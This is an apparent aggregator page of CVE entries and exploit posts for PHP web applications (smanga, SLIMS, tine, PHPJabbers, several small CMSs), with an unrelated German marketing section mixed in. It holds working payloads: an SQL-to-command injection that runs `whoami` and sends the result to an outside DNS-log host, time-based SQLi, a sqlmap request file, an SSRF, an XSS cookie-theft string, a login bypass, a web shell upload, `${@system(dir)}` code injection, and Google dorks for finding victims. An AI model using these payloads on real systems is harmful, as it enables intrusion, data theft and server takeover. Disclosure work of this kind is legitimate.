SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php.

**测试环境说明**

*   版本：3.2.7（最新版）
*   环境：docker

docker搭建所使用的命令：

    docker run -itd --name smanga \
    -p 3333:3306 \
    -p 8097:80 \
    -v /mnt:/mnt \
    -v /route/smanga:/data \
    -v /route/compress:/compress \
    lkw199711/smanga;
    

**1、未授权远程代码执行**

*   漏洞描述

**/php/manga/delete.php**接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。

Payload：

    mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";ping -c 3 `whoami`.357efab8.dns.dnsmap.org.;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
    

*   漏洞复现

payload中触发RCE的是第5个联合查询项，执行命令会先获取服务器用户名并携带用户名信息往dnslog域名发送icmp包，测试成功收到dnslog记录，且获取回显信息。

 

*   漏洞原理  
    payload中通过sql联合查询拼接自己构造的查询项，构造第5个查询项为命令注入点，即mangaPath的值，程序中删除逻辑没有对参数进行过滤，直接使用rm -rf拼接mangaPath删除，造成了命令注入。

其中拼接sql语句的select方法中使用where方法将每个条件进行and分割，干扰了正常union查询的构造，所以不使用逗号，而使用join的形式绕过。

**2、未授权SQL注入**

*   漏洞描述

**补充说明：类似的位置还有很多，均是没有对参数点进行过滤，造成多种类型的SQL注入，修复时可参考一并修复。**

**php/history/add.php**接口处没有对mediaId、mangaId和userId三个参数进行过滤，导致拼接任意sql命令，造成sql注入，未授权的攻击者可获取数据库权限。

*   漏洞复现

使用基于时间的盲注测试mediaId接口。  
构造Payload分别为sleep 6秒和3秒，成功满足预期效果。

    if(now()=sysdate()%2Csleep(3)%2C0)
    

    if(now()=sysdate()%2Csleep(6)%2C0)
    

使用sqlmap利用测试，成功获取数据库名：

*   漏洞原理

sql语句查询没有对接收的参数进行过滤。

**3、未授权任意文件读取**

*   漏洞描述

**/php/get-file-flow.php**接口处file参数没有进行过滤，存在路径遍历，造成任意文件读取漏洞，未授权的攻击者可读取配置文件。

*   漏洞复现

尝试读取/etc/passwd

尝试读取config.ini

*   漏洞原理

没有对file参数进行过滤，导致任意文件读取。

CVE-2023-36076: 3个高危漏洞 · Issue #100 · lkw199711/smanga

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.

**The bug**

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/\* RECORD OPERATION \*/
if (isset($\_POST\['saveData'\])) {
    $data\['member\_type\_id'\] = $\_POST\['memberTypeID'\];
    $data\['coll\_type\_id'\] = $\_POST\['collTypeID'\];
    $data\['gmd\_id'\] = $\_POST\['gmdID'\];
    $data\['loan\_limit'\] = trim($\_POST\['loanLimit'\]);
    $data\['loan\_periode'\] = trim($\_POST\['loanPeriode'\]);
    $data\['reborrow\_limit'\] = trim($\_POST\['reborrowLimit'\]);
    $data\['fine\_each\_day'\] = trim($\_POST\['fineEachDay'\]);
    $data\['grace\_periode'\] = trim($\_POST\['gracePeriode'\]);
    $data\['input\_date'\] = date('Y-m-d');
    $data\['last\_update'\] = date('Y-m-d');
    // create sql op object
    $sql\_op = new simbio\_dbop($dbs);
    if (isset($\_POST\['updateRecordID'\])) {
        /\* UPDATE RECORD MODE \*/
        // remove input date
        unset($data\['input\_date'\]);
        // filter update record ID
        $updateRecordID = (integer)$\_POST\['updateRecordID'\];
        // update the data
        $update = $sql\_op\->update('mst\_loan\_rules', $data, 'loan\_rules\_id='.$updateRecordID);
        if ($update) {
            toastr(\_\_('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(parent.jQuery.ajaxHistory\[0\].url);</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Updated. Please Contact System Administrator')."\\nDEBUG : ".$sql\_op\->error)->error(); }
        exit();
    } else {
        /\* INSERT RECORD MODE \*/
        $insert = $sql\_op\->insert('mst\_loan\_rules', $data); // BUG HERE
        if ($insert) {
            toastr(\_\_('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(\\''.$\_SERVER\['PHP\_SELF'\].'\\');</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Save. Please Contact System Administrator')."\\n".$sql\_op\->error)->error(); }
        exit();
    }
    exit();
} 

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to circulation
    
2.  make sure burp suit is on to capture the request such as below:
    

3.  save the request into a file (example.req)
    
4.  run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  
    
5.  voila
    

**example.req**

    POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
    Host: localhost
    Content-Length: 1195
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
    Accept-Encoding: gzip, deflate
    Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
    Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
    Connection: close
    
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="csrf_token"
    
    98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="memberTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="collTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gmdID"
    
    0
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanPeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="reborrowLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gracePeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="saveData"
    
    Save
    ------WebKitFormBoundarypqBOyIslkQAaoPCi--
    

**Screenshots****proof-of-concept current database**

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  --current-db  

**versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

**notes**

added comment of the bug. last edit at 18 August 2023 21.12 GMT+7

CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php.

**The bug**

A Server Side Request Forgery exists in admin/modules/bibliography/pop_p2p.php at the code below

$detail\_uri = $\_GET\['uri'\] . "/index.php?p=show\_detail&inXML=true&id=" . $\_GET\['biblioID'\];
// parse XML
$data = modsXMLsenayan($detail\_uri, 'uri');

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to bibliography
2.  set up netcat to listen to a specific port (example: 7878)
3.  go to the /admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878
4.  the netcat should receive a request

**Screenshots****proof-of-concept using pipedream****proof-of-concept using netcat****versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

CVE-2023-40969: [Security Bugs]  Server Side Request Forgery at pop_p2p.php · Issue #204 · slims/slims9_bulian

In tine through 2023.01.14.325, the sort parameter of the /index.php endpoint allows SQL Injection.

**Mehr als nur Groupware**

**tine ist die ideale Software für digitale Zusammenarbeit in Unternehmen und Organisationen. Von kraftvollen Groupware-Funktionalitäten bis hin zu cleveren AddOns vereint **tine** alles, um die tägliche Zusammenarbeit im Team zu erleichtern.**

**Kalender****Mit tine wird das Termin­management zum Kinder­spiel. Egal, ob Einzel­termine, Serien­termine oder Ressourcen­planung mit Mitarbeitern oder externen Personen – tine ermöglicht eine unkomplizierte Termin­findung. Schnell und einfach.**

**Adress­buch****Zugegeben: Adressbuch ist eine glatte Unter­treibung. Hier geht es um mehr als eine reine Adress­sammlung. Das tine-Adress­buch ist der perfekte Beziehungs­manager!**

**E-Mail****Mehr als 600 E-Mails erhalten wir durch­schnitt­lich pro Monat am Arbeits­platz. E-Mails sind noch immer, trotz vieler Alter­nativen, das beliebteste Kommu­nika­tions­tool. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features und schon haben Sie mehr Zeit für wichtigere Dinge!**

**Adressbuch**

Zugegeben: Adressbuch ist eine glatte Untertreibung. Hier geht es um mehr als eine reine Adresssammlung. Das Adressbuch ist der perfekte Beziehungsmanager!

**E-Mail**

Mehr als 600 E-Mails erhalten wir durchschnittlich pro Monat am Arbeitsplatz. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features!

**Aufgaben**

Arbeiten Sie noch mit klassischen ToDo-Listen? Also Aufgaben auf Zettel schreiben und sobald sie erledigt sind, durchstreichen?  
Zeit für eine neue Ära!

**Dateimanager**

Für alle die unterwegs oder gemeinsam an Dokumenten arbeiten: Zentral ablegen, teilen, vor unerlaubtem Zugriff schützen und immer überall abrufen.

**Projektzeiterfassung**

Leistungen werden nicht korrekt abgerechnet? tine hilft Ihnen, Kundenprojekte oder unternehmensintern schneller, genauer und korrekter abzurechnen.

**CRM**

Verwalten und pflegen Sie Ihre Kundenbeziehungen und legen Sie all Ihr Wissen über Ihren Kontakt sicher ab – mit einem uneingeschränktem Zugriff auch von unterwegs!

CVE-2023-41364: HOME - tine

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Online ID Generator version 1.0 suffers from remote SQL injection that allows for login bypass and remote shell upload vulnerabilities.

    ## Title: Online-ID-Generator-1.0-SQLi-Bypass-login-ShellUpload-RCE## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip## Reference: https://portswigger.net/web-security/sql-injection## Reference: https://portswigger.net/web-security/file-upload## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload## Description:hat-trick: The system of this pseudo developer is vulnerable to SQLi,Shell Upload, and RCE at the same time.This system must be terminated. To all users who like and follow thisperson: Please STOPT DOING THIS!THIS WILL BE YOUR RESPONSIBLE WHEN YOU LOSE MONEY OR WHATEVERIMPORTANT FOR YOU! BR @nu11secur1tySTATUS: HIGH-CRITICAL Vulnerability[+]Bypass login SQLi:# In login form, for user:```mysqlnu11secur1ty' or 1=1#```[+]Shell Upload exploit:## For system logo:```php<?php  phpinfo();?>```[+]RCE Exploit## Execution from the remote browser:```URLhttp://localhost/id_generator/uploads/1693471560_info.php```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)## Time spend:00:10:00

Online ID Generator 1.0 SQL Injection / Shell Upload

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php